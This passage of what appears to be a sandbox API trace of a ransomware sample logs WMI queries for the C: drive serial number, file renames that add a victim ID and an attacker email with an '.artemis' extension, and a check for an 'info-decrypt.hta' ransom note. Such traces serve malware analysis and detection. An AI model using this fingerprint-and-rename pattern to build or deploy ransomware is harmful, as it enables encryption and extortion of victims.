Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71eeb68 | out: ppvObject=0x71eeb68*=0x0) returned 0x80004002 [0179.539] WbemLocator:IUnknown:AddRef (This=0x6737450) returned 0x3 [0179.539] WbemLocator:IUnknown:QueryInterface (in: This=0x6737450, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee4c4 | out: ppvObject=0x71ee4c4*=0x0) returned 0x80004002 [0179.539] WbemLocator:IUnknown:QueryInterface (in: This=0x6737450, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee474 | out: ppvObject=0x71ee474*=0x0) returned 0x80004002 [0179.539] WbemLocator:IUnknown:QueryInterface (in: This=0x6737450, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee480 | out: ppvObject=0x71ee480*=0x0) returned 0x80004002 [0179.539] CoGetContextToken (in: pToken=0x71ee4e0 | out: pToken=0x71ee4e0) returned 0x0 [0179.539] CoGetContextToken (in: pToken=0x71ee8e8 | out: pToken=0x71ee8e8) returned 0x0 [0179.539] WbemLocator:IUnknown:QueryInterface (in: This=0x6737450, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee978 | out: ppvObject=0x71ee978*=0x0) returned 0x80004002 [0179.540] WbemLocator:IUnknown:Release (This=0x6737450) returned 0x2 [0179.540] WbemLocator:IUnknown:Release (This=0x6737450) returned 0x1 [0179.540] CoGetContextToken (in: pToken=0x71eef58 | out: pToken=0x71eef58) returned 0x0 [0179.540] CoGetContextToken (in: pToken=0x71eeeb8 | out: pToken=0x71eeeb8) returned 0x0 [0179.540] WbemLocator:IUnknown:QueryInterface (in: This=0x6737450, riid=0x71eef88*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppvObject=0x71eef84 | out: ppvObject=0x71eef84*=0x6737450) returned 0x0 [0179.540] WbemLocator:IUnknown:AddRef (This=0x6737450) returned 0x3 [0179.540] WbemLocator:IUnknown:Release (This=0x6737450) returned 0x2 [0179.540] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6734220, puCount=0x71ef11c | out: puCount=0x71ef11c*=0x2) returned 0x0 [0179.540] WbemDefPath:IWbemPath:GetText (in: This=0x6734220, lFlags=8, puBuffLength=0x71ef118*=0x0, pszText=0x0 | out: puBuffLength=0x71ef118*=0xf, pszText=0x0) returned 0x0 [0179.540] WbemDefPath:IWbemPath:GetText (in: This=0x6734220, lFlags=8, puBuffLength=0x71ef118*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef118*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0179.540] CoCreateInstance (in: rclsid=0x745f1284*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x745f12e4*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0x71eeff4 | out: ppv=0x71eeff4*=0x6737460) returned 0x0 [0179.540] WbemLocator:IWbemLocator:ConnectServer (in: This=0x6737460, strNetworkResource="\\\\.\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="", lSecurityFlags=128, strAuthority="", pCtx=0x0, ppNamespace=0x71ef088 | out: ppNamespace=0x71ef088*=0x67480ac) returned 0x0 [0188.991] WbemLocator:IUnknown:QueryInterface (in: This=0x67480ac, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eef24 | out: ppvObject=0x71eef24*=0x780af4) returned 0x0 [0188.991] WbemLocator:IClientSecurity:QueryBlanket (in: This=0x780af4, pProxy=0x67480ac, pAuthnSvc=0x71eef74, pAuthzSvc=0x71eef70, pServerPrincName=0x71eef68, pAuthnLevel=0x71eef6c, pImpLevel=0x71eef5c, pAuthInfo=0x71eef60, pCapabilites=0x71eef64 | out: pAuthnSvc=0x71eef74*=0xa, pAuthzSvc=0x71eef70*=0x0, pServerPrincName=0x71eef68, pAuthnLevel=0x71eef6c*=0x6, pImpLevel=0x71eef5c*=0x2, pAuthInfo=0x71eef60, pCapabilites=0x71eef64*=0x1) returned 0x0 [0188.991] WbemLocator:IUnknown:Release (This=0x780af4) returned 0x1 [0188.991] WbemLocator:IUnknown:QueryInterface (in: This=0x67480ac, riid=0x745f10f4*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eef18 | out: ppvObject=0x71eef18*=0x780b14) returned 0x0 [0188.991] WbemLocator:IUnknown:QueryInterface (in: This=0x67480ac, riid=0x745f1104*(Data1=0x13d, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eef14 | out: ppvObject=0x71eef14*=0x780af4) returned 0x0 [0188.991] WbemLocator:IClientSecurity:SetBlanket (This=0x780af4, pProxy=0x67480ac, dwAuthnSvc=0xa, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x20) returned 0x0 [0188.991] WbemLocator:IUnknown:Release (This=0x780af4) returned 0x2 [0188.992] WbemLocator:IUnknown:Release (This=0x780b14) returned 0x1 [0188.992] CoTaskMemFree (pv=0x77e118) [0188.992] WbemLocator:IUnknown:Release (This=0x6737460) returned 0x0 [0189.518] WbemLocator:IUnknown:QueryInterface (in: This=0x67480ac, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eeb14 | out: ppvObject=0x71eeb14*=0x780b14) returned 0x0 [0189.519] WbemLocator:IUnknown:QueryInterface (in: This=0x780b14, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71eead0 | out: ppvObject=0x71eead0*=0x0) returned 0x80004002 [0189.649] WbemLocator:IUnknown:QueryInterface (in: This=0x780b14, riid=0x74b4fe90*(Data1=0xb196b283, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71ee8ec | out: ppvObject=0x71ee8ec*=0x0) returned 0x80004002 [0189.692] WbemLocator:IUnknown:AddRef (This=0x780b14) returned 0x3 [0189.692] WbemLocator:IUnknown:QueryInterface (in: This=0x780b14, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee42c | out: ppvObject=0x71ee42c*=0x0) returned 0x80004002 [0190.110] WbemLocator:IUnknown:QueryInterface (in: This=0x780b14, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee3dc | out: ppvObject=0x71ee3dc*=0x0) returned 0x80004002 [0190.112] WbemLocator:IUnknown:QueryInterface (in: This=0x780b14, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee3e8 | out: ppvObject=0x71ee3e8*=0x780a74) returned 0x0 [0190.112] WbemLocator:IMarshal:GetUnmarshalClass (in: This=0x780a74, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee3f0 | out: pCid=0x71ee3f0*(Data1=0x17, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 [0190.112] WbemLocator:IUnknown:Release (This=0x780a74) returned 0x3 [0190.112] CoGetContextToken (in: pToken=0x71ee448 | out: pToken=0x71ee448) returned 0x0 [0190.112] CoGetContextToken (in: pToken=0x71ee3f8 | out: pToken=0x71ee3f8) returned 0x0 [0190.112] CoGetContextToken (in: pToken=0x71ee850 | out: pToken=0x71ee850) returned 0x0 [0190.112] WbemLocator:IUnknown:QueryInterface (in: This=0x780b14, riid=0x74b4fb48*(Data1=0x144, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee8e0 | out: ppvObject=0x71ee8e0*=0x780afc) returned 0x0 [0190.112] WbemLocator:IRpcOptions:Query (in: This=0x780afc, pPrx=0x780b14, dwProperty=2, pdwValue=0x71ee908 | out: pdwValue=0x71ee908) returned 0x80004002 [0190.112] WbemLocator:IUnknown:Release (This=0x780afc) returned 0x3 [0190.473] WbemLocator:IUnknown:Release (This=0x780b14) returned 0x2 [0190.473] CoGetContextToken (in: pToken=0x71eee28 | out: pToken=0x71eee28) returned 0x0 [0190.473] CoGetContextToken (in: pToken=0x71eed88 | out: pToken=0x71eed88) returned 0x0 [0190.473] WbemLocator:IUnknown:QueryInterface (in: This=0x780b14, riid=0x71eee58*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x71eee54 | out: ppvObject=0x71eee54*=0x67480ac) returned 0x0 [0190.473] WbemLocator:IUnknown:AddRef (This=0x67480ac) returned 0x4 [0190.473] WbemLocator:IUnknown:Release (This=0x67480ac) returned 0x3 [0190.473] WbemLocator:IUnknown:Release (This=0x67480ac) returned 0x2 [0190.473] SysStringLen (param_1=0x0) returned 0x0 [0190.473] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x67341b0, puCount=0x71ef1ec | out: puCount=0x71ef1ec*=0x0) returned 0x0 [0190.473] WbemDefPath:IWbemPath:GetText (in: This=0x67341b0, lFlags=2, puBuffLength=0x71ef1e8*=0x0, pszText=0x0 | out: puBuffLength=0x71ef1e8*=0x20, pszText=0x0) returned 0x0 [0190.474] WbemDefPath:IWbemPath:GetText (in: This=0x67341b0, lFlags=2, puBuffLength=0x71ef1e8*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef1e8*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0190.474] CoGetContextToken (in: pToken=0x71eee58 | out: pToken=0x71eee58) returned 0x0 [0190.474] WbemLocator:IUnknown:AddRef (This=0x780b14) returned 0x3 [0190.474] WbemLocator:IUnknown:QueryInterface (in: This=0x780b14, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eecec | out: ppvObject=0x71eecec*=0x780b14) returned 0x0 [0190.474] WbemLocator:IUnknown:Release (This=0x780b14) returned 0x3 [0190.474] WbemLocator:IUnknown:Release (This=0x780b14) returned 0x2 [0190.474] WbemDefPath:IWbemPath:GetText (in: This=0x67341b0, lFlags=2, puBuffLength=0x71ef1f0*=0x0, pszText=0x0 | out: puBuffLength=0x71ef1f0*=0x20, pszText=0x0) returned 0x0 [0190.474] WbemDefPath:IWbemPath:GetText (in: This=0x67341b0, lFlags=2, puBuffLength=0x71ef1f0*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x71ef1f0*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0190.474] IWbemServices:GetObject (in: This=0x67480ac, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x71ef1a4*=0x0, ppCallResult=0x0 | out: ppObject=0x71ef1a4*=0x673bdf8, ppCallResult=0x0) returned 0x0 [0191.275] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6734220, puCount=0x71ef1a4 | out: puCount=0x71ef1a4*=0x2) returned 0x0 [0191.275] WbemDefPath:IWbemPath:GetText (in: This=0x6734220, lFlags=4, puBuffLength=0x71ef1a0*=0x0, pszText=0x0 | out: puBuffLength=0x71ef1a0*=0xf, pszText=0x0) returned 0x0 [0191.275] WbemDefPath:IWbemPath:GetText (in: This=0x6734220, lFlags=4, puBuffLength=0x71ef1a0*=0xf, pszText="00000000000000" | out: puBuffLength=0x71ef1a0*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0191.275] IWbemClassObject:Get (in: This=0x673bdf8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x71ef1a0*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3460148*=0, plFlavor=0x346014c*=0 | out: pVal=0x71ef1a0*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3460148*=8, plFlavor=0x346014c*=0) returned 0x0 [0191.275] SysStringByteLen (bstr="9C354B42") returned 0x10 [0191.275] SysStringByteLen (bstr="9C354B42") returned 0x10 [0191.276] IWbemClassObject:Get (in: This=0x673bdf8, wszName="VolumeSerialNumber", lFlags=0, pVal=0x71ef1a8*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), pType=0x3460148*=8, plFlavor=0x346014c*=0 | out: pVal=0x71ef1a8*(varType=0x8, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1="9C354B42", varVal2=0x0), pType=0x3460148*=8, plFlavor=0x346014c*=0) returned 0x0 [0191.276] SysStringByteLen (bstr="9C354B42") returned 0x10 [0191.276] SysStringByteLen (bstr="9C354B42") returned 0x10 [0191.276] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", nBufferLength=0x105, lpBuffer=0x71eeda8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms", lpFilePart=0x0) returned 0x7a [0191.276] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.id-9C354B42.[khalate@tutanota.com].artemis", nBufferLength=0x105, lpBuffer=0x71eeda8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.id-9C354B42.[khalate@tutanota.com].artemis", lpFilePart=0x0) returned 0xa5 [0191.276] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef208) returned 1 [0191.276] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), fInfoLevelId=0x0, lpFileInformation=0x71ef284 | out: lpFileInformation=0x71ef284*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0191.276] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef204) returned 1 [0191.276] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms.id-9C354B42.[khalate@tutanota.com].artemis" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000001.regtrans-ms.id-9c354b42.[khalate@tutanota.com].artemis")) returned 0 [0191.278] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", nBufferLength=0x105, lpBuffer=0x71eee4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpFilePart=0x0) returned 0x7a [0191.278] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", nBufferLength=0x105, lpBuffer=0x71eee44, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpFilePart=0x0) returned 0x7a [0191.278] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\info-decrypt.hta", nBufferLength=0x105, lpBuffer=0x71eee4c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\info-decrypt.hta", lpFilePart=0x0) returned 0x2e [0191.278] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef2ac) returned 1 [0191.278] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\info-decrypt.hta" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\info-decrypt.hta"), fInfoLevelId=0x0, lpFileInformation=0x71ef328 | out: lpFileInformation=0x71ef328*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62089c0, ftCreationTime.dwHighDateTime=0x1d6a20b, ftLastAccessTime.dwLowDateTime=0x62089c0, ftLastAccessTime.dwHighDateTime=0x1d6a20b, ftLastWriteTime.dwLowDateTime=0x622eb20, ftLastWriteTime.dwHighDateTime=0x1d6a20b, nFileSizeHigh=0x0, nFileSizeLow=0x1557)) returned 1 [0191.278] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef2a8) returned 1 [0191.278] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", nBufferLength=0x105, lpBuffer=0x71eedc8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpFilePart=0x0) returned 0x7a [0191.278] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef274) returned 1 [0191.278] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), fInfoLevelId=0x0, lpFileInformation=0x3460dd8 | out: lpFileInformation=0x3460dd8*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28f86da0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28f86da0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x40b0f7f0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x80000)) returned 1 [0191.278] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71ef270) returned 1 [0191.278] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", nBufferLength=0x105, lpBuffer=0x71eecb4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms", lpFilePart=0x0) returned 0x7a [0191.278] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x71ef1a8) returned 1 [0191.278] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000002.regtrans-ms" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\ntuser.dat{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.tmcontainer00000000000000000002.regtrans-ms"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0191.280] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x71edfe0) returned 1 [0191.280] CoTaskMemAlloc (cb=0x20c) returned 0x98315b8 [0191.280] SHGetFolderPathW (in: hwnd=0x0, csidl=37, hToken=0x0, dwFlags=0x0, pszPath=0x98315b8 | out: pszPath="C:\\Windows\\system32") returned 0x0 [0191.280] CoTaskMemFree (pv=0x98315b8) [0191.403] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x71eec88, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0191.403] CoGetObjectContext (in: riid=0x339b9ac*(Data1=0x1ce, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71ef1d0 | out: ppv=0x71ef1d0*=0x72015c) returned 0x0 [0191.404] IComThreadingInfo:GetCurrentApartmentType (in: This=0x72015c, pAptType=0x71ef1c8 | out: pAptType=0x71ef1c8*=1) returned 0x0 [0191.404] IUnknown:QueryInterface (in: This=0x72015c, riid=0x339b994*(Data1=0x51372ae0, Data2=0xcae7, Data3=0x11cf, Data4=([0]=0xbe, [1]=0x81, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xa2, [6]=0xfa, [7]=0x25)), ppvObject=0x71ef1cc | out: ppvObject=0x71ef1cc*=0x0) returned 0x80004002 [0191.404] IUnknown:Release (This=0x72015c) returned 0x1 [0191.405] CoGetClassObject (in: rclsid=0x7588a4*(Data1=0xcf4cc405, Data2=0xe2c5, Data3=0x4ddd, Data4=([0]=0xb3, [1]=0xce, [2]=0x5e, [3]=0x75, [4]=0x82, [5]=0xd8, [6]=0xc9, [7]=0xfa)), dwClsContext=0x15, pvReserved=0x0, riid=0x74aad1fc*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x71eeb38 | out: ppv=0x71eeb38*=0x6736e98) returned 0x0 [0191.405] WbemDefPath:IUnknown:QueryInterface (in: This=0x6736e98, riid=0x74ae0ae0*(Data1=0xb196b28f, Data2=0xbab4, Data3=0x101a, Data4=([0]=0xb6, [1]=0x9c, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x34, [6]=0x1d, [7]=0x7)), ppvObject=0x71eed50 | out: ppvObject=0x71eed50*=0x0) returned 0x80004002 [0191.405] WbemDefPath:IClassFactory:CreateInstance (in: This=0x6736e98, pUnkOuter=0x0, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71eed64 | out: ppvObject=0x71eed64*=0x6738a10) returned 0x0 [0191.405] WbemDefPath:IUnknown:Release (This=0x6736e98) returned 0x0 [0191.405] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a10, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee984 | out: ppvObject=0x71ee984*=0x6738a10) returned 0x0 [0191.405] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a10, riid=0x74b4fc00*(Data1=0xc3fcc19e, Data2=0xa970, Data3=0x11d2, Data4=([0]=0x8b, [1]=0x5a, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xb7, [6]=0xc9, [7]=0xc4)), ppvObject=0x71ee940 | out: ppvObject=0x71ee940*=0x0) returned 0x80004002 [0191.405] WbemDefPath:IUnknown:AddRef (This=0x6738a10) returned 0x3 [0191.405] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a10, riid=0x74b4f90c*(Data1=0xecc8691b, Data2=0xc1db, Data3=0x4dc0, Data4=([0]=0x85, [1]=0x5e, [2]=0x65, [3]=0xf6, [4]=0xc5, [5]=0x51, [6]=0xaf, [7]=0x49)), ppvObject=0x71ee29c | out: ppvObject=0x71ee29c*=0x0) returned 0x80004002 [0191.405] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a10, riid=0x74b4f860*(Data1=0x94ea2b94, Data2=0xe9cc, Data3=0x49e0, Data4=([0]=0xc0, [1]=0xff, [2]=0xee, [3]=0x64, [4]=0xca, [5]=0x8f, [6]=0x5b, [7]=0x90)), ppvObject=0x71ee24c | out: ppvObject=0x71ee24c*=0x0) returned 0x80004002 [0191.405] WbemDefPath:IUnknown:QueryInterface (in: This=0x6738a10, riid=0x74b3c350*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x71ee258 | out: ppvObject=0x71ee258*=0x7ae450) returned 0x0 [0191.406] WbemDefPath:IMarshal:GetUnmarshalClass (in: This=0x7ae450, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pv=0x0, dwDestContext=0x3, pvDestContext=0x0, mshlflags=0x0, pCid=0x71ee260 | out: pCid=0x71ee260*(Data1=0x33a, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46))) returned 0x0 